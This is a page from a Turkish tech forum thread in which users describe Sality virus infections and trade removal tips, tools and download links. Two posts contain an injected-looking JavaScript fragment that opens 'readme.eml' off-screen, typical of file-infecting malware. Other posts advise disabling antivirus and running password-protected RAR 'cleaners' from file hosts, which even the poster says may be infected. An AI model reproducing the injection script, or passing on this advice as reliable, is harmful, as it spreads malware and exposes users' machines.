Üye Girişi
Bağlan Google+ ile Bağlan Facebook ile Bağlan
Yeni Kayıt
Tüm Forumlar
  • Tüm Forumlar
  • İşletim Sistemleri ve Yazılımlar
  • Yazılım Genel
  • Güvenlik Programları
  • Bu Konuda
Şimdi Ara

Virus.Win32.Sality.aa virüsü (16. sayfa)

Sıcak Fırsatlarda Tıklananlar
Editörün Seçtiği Fırsatlar
Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
346
Cevap
3
Favori
108.856
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
Konuya Özel
0 oy
Öne Çıkar
Cevapla
Sayfa: önceki 1415161718
Sayfaya Git
Git
sonraki
Giriş
Mesaj
  • Bu virüs bana da bulaştı. Öğretim görevlisi bir akrabamdan flash bellek aldım (açık açık uyardı üniversite ağında virüsler cirit atıyor flash virüs dolu takma diye) laptopumda Avira Premium Security + Usb Disc Scan + USB Disc Security üçlüsü var ve bu üçlüye güvendim laptopa taktım ve flashtaki virüslerin çoğunu sildi. Laptopta herhangi bir sorun oluşturmadı, ancak ben virüsleri sildiğim için herhangi bir koruma yazılımı olmayan netbuka taktım ve işte o zaman sality virüsünü yedim. İlk olarak görev yöneticisi kapandı, denediğim tüm yöntemler sonuçsuz kaldı. Şu ana kadar mavi ekran ya da restart atma gibi sorunlar yaşamadım, Panda IS 2011, Emsisoft Anti Malware yükledim tarattım ve birçok zararlı sildi ancak yine de görev yneticisi açılmıyor. Combofix yükledim ama hiç yüklememişim gibi açılmıyor, tepki vermiyor. Açıkçası sıksık online bankacılık ve alışveriş yapan biriym. Bu virüs kimlik hırsızlığı yapıyor mu ? Tek korkum bu, çünkü netbukumda hiçbir bilgi ve program yok, tek tuşla formatı basarım gider, ancak kredi kartı ve msn facebook bilgilerim çalınır diye korkuyorum. Gerçi Tam sürüm Zemana yükledim, herhalde engeller bu tür şeyleri ama yine de sorayım dedim.

    Ekleme: @birolayd'ın verdiği linkteki CA antivirüsü indirdim, inanılır gibi değil; panda, kaspersky, combofix, emsisoft ve malwarebytes'ın bulamadığı 17 zararlıyı hem de normal kipte buldu ve sildi. Şu an görev yöneticisi vb. hiç bir sorun kalmadı. Kendisine teşekkür ediyorum.



    < Bu mesaj bu kişi tarafından değiştirildi Of Monsters and Men -- 24 Temmuz 2011; 19:36:29 >




  • Bu virüsü yazan kişi bana göre Nobel ödülüne layık biri... ayrıca ben bunu yazanın normal bir insan evladı olduğunu düşünmüyorum Ya CIA Ya NSA Yada Spetznatz olabilir
  • ben gondereyim sana hocam heheh bi dene bakalim sistemin nasil olacak

    harddiske ps3 oyunu attim.arkadasimdan bana gecti 1 gunum ziyan oldu sagolsun sality
  • Gerekli dosyalaranız fazla yoksa format çekin hiç uğraşmayın bugün yine başıma geldi format çektim geçti lanet olasıca virüs için uğraşmaya deymiyor format çekmek en iyisi tabi önemli dosyalarınız yoksa varsada 1kaç yöntemi var biraz zahmetli bir iş
  • Bir kaç yöntem mevcut sanırım virüsten kurtulmak için.Daha 3 gün önce başıma geldi ve kurtulmayı başardım.
    1.Yöntem: Format çekip kurtulmak isteyenler içim. Öncelikle yedekledikleri dosyalarda herhangi bir .exe dosyası olmamasına dikkat etmeli.Program arşiviniz felan varsa unutun ve silin hemen yani.Zaten bu devirde program arşivinin mantığı yok.Format attıktan sonra şuradan kaspersky 2012 internet security indirip kurun ve daha önceki arşivinizi baştan sona bir taratın.Bu aşamaları gerçekleştirdikten sonra virüsten kurtulmuş olmanız gerekiyor.

    2.Yöntem Format atmayıp uğraşalım diyenler için. Kaspersky sality için özel olarak bir sunum hazırlamış şuradan ulaşabilirsiniz.Burada kasperskyın sunduğu çözüm önerisinden önce yine kaspersky 2012 internet security indirip bir kurun.Ardından kasperskyın anlatımında bulunan Sality Killer zipini indirip açın ve çalıştırın.Burada Sality Killer ve Kaspersky 2012 internet security aynı anda çalıştığında sadece kaspersky securitynin bulduğundan daha fazla virüslü dosya bulunuyor.Bunu yapmamızın sebebi bu.Taramaların bitmesinin ardından registrynin düzeltilmesi için Sality Regkey'leri indirin ve sırasıyla çalıştırın. Bu aşamadan sonra virüsten kurtulmuş olmalısınız.Ama yok abi galiba ben de halen var bu virüs galiba gibi bir hisse sahipseniz (sality virüsünü yedikten sonra böyle bir sendrom yaşamanız gayet normal )

    Buyurun Chip'in sitesinde daha fazla sality temizleme aracının verildiği bir konu açılmış.Oradan diğer sality temizleme araçlarına da ulaşabilirsiniz.Ama benim önerim (bu kimilerine göre Nod32, Antivir,Avast olabiliyor) öncelikle kaspersky 2012 internet security'i indirip bir kurun.Zaten trial versiyon işinizi görecektir.Normalde antivirüs programı kullanmam sadece bu virüsü silmek için indirdim, kaspersky işe yaradığı için onu öneriyorum o kadar. Umarım faydalı olur ve temizleyebilirsiniz bilgisayarınızı.




  • quote:

    Orijinalden alıntı: HeNRy__

    hala bu virüsle karşılaşmadım
    nerelere girdiğinizi çok merak ediyorum


    Flashbelleklerden bulaşıyor daha çok bu virüs.Yoksa milletin bir yerlere girdiğinden değil
  • quote:

    Orijinalden alıntı: axu067

    combofix yaramıyor..inanmayacaksınız ama çözümü 18 saat araştırarak buldum..bu virüs banada girmiş durumdaydı geçen gün,ama artık çözümün paylaşmak istedim saygılar..kendim yükledim linkte sorun oluşursa burdan yazın yeniden yüklerim..cmd komutu çalışırken bütün uygulamaları kapatın ayrıca modemide fişten çekin..bunları güvenlik kipte yapın..ayrıca bi aşağıda dediklerimi de yapın

    http://www.dosya.tc/Win32.Sality.aavir_sdelete.rar.html

    rar şifresi: axu067


    dosya silinmiş tekrar eklermisiniz ?




  • quote:

    Orijinalden alıntı: pc-system1

    http://rapid share.com/files/417702547/Sality.rar
    MD5: 613149F9F94FD5CA2FC629BBC9DB4EFF

    231kb rar dosyası içinde 2 tane Sality temzileme uygulaması mevcut.Upload ettim.
    Daha önce kullanmıştım.
    İşinizi görebilir.



    silinmiş bu Tekrar upload edermisiniz ?
  • quote:

    Orijinalden alıntı: SerseriGezgin

    Bu virüsü yazan kişi bana göre Nobel ödülüne layık biri... ayrıca ben bunu yazanın normal bir insan evladı olduğunu düşünmüyorum Ya CIA Ya NSA Yada Spetznatz olabilir


    Çok haklısınız SerseriGezgin. 1 sene önce iş yerindeki bir bilgisayara sality bulaşmıştı. İlk başlarında her ne kadar yazan için söylendiysem de daha sonra hayranlık duydum. 1 hafta boyunca mücadele ettim ve kazandım.
    Sality virüsünün format atmakla kesinlikle temizlenmediğini bir müddet sonra tekrar ortaya çıktığını gerek yerli gerek yabancı forumlarda okudum. Zaten format atmayı hiç sevmem savaşmak dururken:) Online taratma yapmaz, antivirüsle ilgili ve benzer tüm kelimeleri bilir ve bu kelimeleri içeren program, yazılım çalıştırmaz, internette aratma yaptırmaz. Muhtemelen her mücadele sırasında biraz daha güçlenerek gelişir. System32 klasöründeki MRT ile ile tespit edebildim. Gerisini daha önce paylaşmış olduğum forumdan yapıştırıyorum

    Yoğun bir mücadelenin ardından hasta kısmen de olsa ayaklandı
    Sality gerçekten çok berbat bir virüsmüş. sürekli deneme yanılma yöntemiyle çalıştığımdan epey vakit kaybettim. Yapılması gereken en doğru adımın cd veya usb üzerinden bie antivirüs programı çalıştırmak olduğunu gördüm. Kendileri linux üzerinden çalıştığından benim xp etkisiz haldeyken işini gördü. Önce usb üzerinden Avast'ı denedim ama ekranda donma problemi yaşadım. Daha sonra Kaspersky Rescue yu ücretsiz indirip usb üzerine kurdum ve bilgisayarı tarattım. Yaklaşık 1400 yere dosyasına virüs sality.aa bulaşmış. Tavsiyeler tarama işlemi tamamlandıktan sonra bir av kurup tekrar tarama yapmak yönünde. Ancak Avast'ın kurulum sırasında sürekli kapanması işin bitmediğini gösterdi. Biraz daha uğraştım ve bıraktım. Haftasonundan isifade pc'yi kapıp eve götürdüm ve tekrar tarattım. İnanması zor ama 1700 adetlik bir rapor önüme geldi. Bu sefer aa türevi haricinde az adette olsada salitiy'nin değişik bir türevide ortaya çıktı. Bu sefer tekrar başlattıktan sonra avastı kurabildim ve yeni bir tarama daha yaptım yaklaşık 200 adet! Tekrar tarattım 9 adet, tekrar tarattım ve 0.
    Şimdi xp hasarlı. Bazı programların exe dosyaları silindiğinden çalışmıyorlar. Xp yi cd den taratarak düzeltmeyi denedim ama pek bir faydası olmadı.
    Benzer sorunla karşılaşan arkadaşlara önrim şu yöndedir:
    1-önce verilerinizi yedekleyin. Yedeklenecek dosyalar arasında exe dosyaları bulunmasın.
    2-Cd veya usb üzerinden kurduğunuz av ile sırasıyla önce boot dosyaları, tek tek sabit disklerinizi taratın. Sonra tüm seçenekleri işaretleyerek tekrar bir tarama yapın. Yakalanan virüsleri dosya türüne bakamaksızın sonsuza kadar silin.
    3-Bilgisayarı tekrar başlatın ve av ile tekrar tarama yapın. Bu işlemi 0 virüs görene kadar tekrar edin.
    4-Muhtemelen işletim sisteminiz hasarlandı, bazı programlarınızda artık çalışmıyor. Bundan sonra virüsün tekrar hortlama ihtimali olmayan bilgisayarınıza format atabilir veya benim gibi inat edip sizin için önceliği olan bölümleri tamir ederek kullanmaya devam edebilirsiniz.


    Şu anda kısmen hasarlı bir xp kullanıyorum. Görev yöneticisi gibi bir sürü şey çalışmıyor. Ama ilginçtir ki kullanmış olduğum programlara hiç etkisi olmadığı gibi açılışı inanılmaz hızlı:)




  • [code][/code] </script></body></html> </script></body></html>
    <html>
    <body>
    //Body
    </body>
    </html>
    <html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
    <html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>..
  • [code</script></body></html> </script></body></html>
    <html>
    <body>
    //Body
    </body>
    </html>
    <html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>
    <html><script language="JavaScript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html>..][/code]]
  • Bir de bunu deneyin bakalım.
    Oku dosyasının içinde nasıl silineceğini anlattım.

    http://www.filesonic.com/file/1804029404/Sality.rar
    veya
    http://www.fileserve.com/file/gd2bzGA/Sality.rar
  • ----------------------------MUTLAKA OKUYUN-------------------------------


    Arkadaşlar bende bir oyun yüzünden sality yedim ve onu silmeyi başardım.Ben yandım başkaları yanmasın diye üşenmeden yazıyorum mutlaka okuyun.Nasıl mı anlatayım hemen

    Herşey guitar hero metallice for pc oyununu indirmemle başladı.Oyunu indirdim rardan çıkarttım ve anında avast uyarıyı bastı ve karantinaya aldı.Bende oyunu zar zor indirmiştim ve birazcıkta olsa oynamadan silmek istemedim ve pişmanlıkla söylüyorum karantinadan çıkartıp avastı 10 dk lık kapattım.Evet olan herşeyin başlangıçı burada oldu. Neyse konuya dönelim oyunu açtım gayet güzel çalışıyordu ama bir sorun vardı oyunda bazı engeller olması gerekiyordu ve onlar yoktu.Şaşırdım ve oynu kapattığımda pc kasılmaya başladı ve antivirüs çalışır halden çalışmaz ve dahada kötüsü açılmaz hale geldi.Ve tesadüf ki bende onunla (virüs) ilgili bir makale okumuştum o gün. Sonra bir baktım görev yöneticisi çalışmıyor.Kayıt defteri açılmıyor.İçimden dedimki ben bittim.Afedersiniz b..'u döktüm dedim kendi kendime :). Ama pes etmedim hemen bu foruma koştum bir hızla.Araştırdım ve bir arkadaş Super Anti SPyware free editiondan bahsetmiş ve bayağı övmüş.Hemen indirdim kurdum.Yaklaşık 200 tane virüs buldu.Hemen sildim ama bitmiyorlarki arkadaş sil sil.Hemen düşündüm ne yapsam da şu görev yöneticisini açsam sonrada şu virüsü işlemler penceresinden sonlandırsam dedim.Aklımda lamba yandı ve hemen bir download sitesinden görev yöneticisi kontrol programı indirdim ve çalıştı gerçekten çalıştı açıldı görev yöneticisi.Önümde duruyordu.Hemen tabiki ''Senin işin bitti,yandın olum sen virüüüs :)'' dedim ve çalışan güvenli olmayan tüm programları kapattım.PC biraz hızlanmıştı.Ama bu bile umut ışığı oldu ve hemen foruma geri döndüm ve bazı arkadaşlar CA antispy ware miydi ne onu indirin demişler bende onu indirdim ve kurdum bir sürü sildi.Ama küçük bir sorun vardı o sorun ise C: ve D: ' de sürekli iccf.exe afcv.exe diye dosyalar oluşuyordu.Siliyordum siliyordum halen oluşuyordu.Hemen biraz araştırma ve sonucunda 2 küçük programcığa ulaştım.Hemen indirdim ve o pis kötü kokulu 2 dosya kayboldu.Hemen sonra ''Sıra kayıt defterine geldi''dedim.Glarysoft 'un bir registry programcığı var 2mb bişey.Onunla da registy'imi tamir ettim ve sonuuuç.Bu yazıyı bütün bunlardan hemen sonra yazıyorum.Şimdide olmuşmu diye ctrl+alt+del yapıyorum izninizle .Eveeeet işte budur ya açıldı.Ohh neyse hemen o 2 küçük programcığın linkini sizlere veriyorum.Ama rar dan çıkartmanız şart yoksa taramıyor.Diğer büyük antivirüs programlarınıda bulursunuz her yerden.
    Son uyarımıda yapayım linkleri paylaşacağım: Benim pc iyi bir virüs saldırısı atlattığından 2 küçük programcığın da içinde bulunduğu rar dosyasında virüs olma ihtimali %5 de olsa var lütfen sizde yaşamayın bu lanet virüsü 5 saat uğraştırdı beni meret :)

    http://www.arsivindir.com/programlar/win32-sality-virus-clean.rar

    Rar şifresiwww.arsivindir.com ---- ForumDonanimhaber.com ve Arsivindir.com sitesine Sonsuz Saygım oluştu.İkisinede teşekkür borçluyum ve o antivirüs tavsiyesinde bulunan arkadaşlarada teşekkürlerimi sunuyorum.
    İyi günler




  • Benim flash belleğimde vardı. Klasörler exe uzantılı oluyor. Ayrıca virüs girmemiş klasörlerde vardı. Öncelikle onlara hiç dokunmayın. Exe uzantılı klasörlerin içindeki dosyalar virüssüz; ancak o klasörün içindeki klasörler de virüslü. Exeli klasörleri açıp içindeki dosyaların hepsini kesin ve klasör içinde kalmayacak şekilde bir yere yapıştırın. Ben çıkardım ve flash bellek içinde bıraktım. Boş kalan klasörlerin hepsi aynı kb gösteriyor. Bendekilerin tamamına yakını 539 kb görünüyordu. Tabii siz bu işlemleri yaparken bu virüs açmış olduğunuz her virüslü klasörü çoğaltıp duruyor; ama boş olarak. Bir sürü de içi boş klasörü açıyor. Boşverin, o kafasına göre takılsın. Açtıklarını kapatıverirsiniz. Dosya çıkarma işlemi bitince başlat-ara-dosya ya da klasör-tüm dosya ve klasörleri deyip "exe" yazın. Virüs nerdeyse orada aratın. Benimki flash bellekte olduğu için ben "G" de arattım. Bu namussuzların hepsi armut gibi dizilecek. "Boyut" yazan yere fare sol tıkla bir kere tıklayın. En düşükten en büyüğe doğru sıralanacak. Bu namussuzlarda aynı kb olduğu için alt alta dizili duracak. Siz hemen bunları seçili hale getirip "shift+delete" deyip ardından hemen "enter" diyeceksiniz. Birkaç saniye geçirmeden şak diye flash belleği çekip alacaksınız. Sonra bir virüs programıyla flash belleği taratın. Zaten tüm klasörleri yok ettiyseniz o bir şey bulamaz. Unuttuğunuz klasör varsa da içindeki dosyalarla birlikte elveda diyebilirsiniz. Önemli olan tek tek klasör içindeki dosyaları çıkarmak, gerisi hava civa. Ben avg ile tarattım, tek unuttuğum klasörü siliverdi. Helali hoş olsun. Bende kurulu avast vardı, avg siler diye duyduğum için onu kurdum. Bu virüs C veya D sürücüsünde ise bu yöntem nasıl uygulanır, bilemem. Üretin, çoğaltın, uydurup kaydırın; ama formata gerek yok bence. Bendeki avast bile flash belleği takıp virüslü klasöre yaklaştığımda hemen karantinaya atıyordu. Temiz bir harici harddisk veya flash belleğe dediğim yöntemle C veya D'deki virüslü klasörlerin içindeki "dosyalar" atılabilir. Tek sıkıntınız hangi dosya hangi klasörün içindeydi, olur. Siz de harici harddiskin içine aynı adlarla yeni klasörler açıp ona atarsınız. Ama bunu denemedim. Benden bu kadar. Kolay gelsin.




  • Salitykiller programı bilgisayarımı baya bi rahatlattı ve görev yöneticisi devre dışı olayıda kendiliğinden çözüldü

    bu linkten indirin -->http://www.kaspersky.com/downloads/utils/salitykiller.zip

    * Bilgisayarmızda sistem geri yüklemeyi kapatalım ve sonra ağda bu virüsün bulaştığı bilgisayarlardan tekrar bulaşma olmaması için internet bağlantımızı keselim…
    * Varsa antivirüsmüzü devre dışı bırakalım…
    * Sality Killer yazılımızı açıp çalıştıralım yanlız vista veya windows7 işletim sistemi kullanıyorsak Sality Killer yazılımını sağ tıklayıp “yönetici olarak çalıştır” diyerekten çalıştıralım…
    * Sality Killer yazılımı dos ortamında işlemciden başlamak üzere tüm bilgisayarımızı tarayıp bu virüsten temizleyecektir…
    * Eğer birden fazla bilgisayarın bağlı olduğu bir yerel ağ kullanıyorsak bilgisayarımızı internete bağlamadan önce diğer bilgisayarlarda aynı adımları takip ederek diğer bilgisayarlarımızı temizleyelim…




  • virüs harici 2 tb lik HDD me bulaştı.oyunların setup exe leri autorun exe leri falan hep virüs olarak gösteriyor avast.Bu dosyaları silmeden ayıklıyabilirmiyim bu virüsü.Lütfen yardım ='(( Paylaş:
  • Çok zor arkadaşım.. mecbur o exeleri de silmek zorundasın.. büyük geçmiş olsun
  • quote:

    Orijinalden alıntı: SerseriGezgin

    Çok zor arkadaşım.. mecbur o exeleri de silmek zorundasın.. büyük geçmiş olsun

    o zman güle güle dicez.Bi yolu olmalı ya arşiv yalan oldu
    Teşekkürler arkadaşım
  • sality sürekli yayın bir virüs , benimde başıma geldi birkez , tavsiyem komple format atmandır.
    Lakin yedekleme yaparak atarsan tekrar sızma olasılığı yüksektir.
  • Çok farklı çeşitleri vardır sality nin çalışma şekil olarak.. misal simgesi msn ama alttaki yazan yazı gta yada herhangi başka bişe ise..sakın tıklamayın ona direk silin
    • 
Sayfa: önceki 1415161718
Sayfaya Git
Git
sonraki
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.
Hizmet kalitesi için çerezleri kullanabiliriz. DH’ye girerek kullanım izni vermiş sayılırsınız.
Anladım Veri Politikamız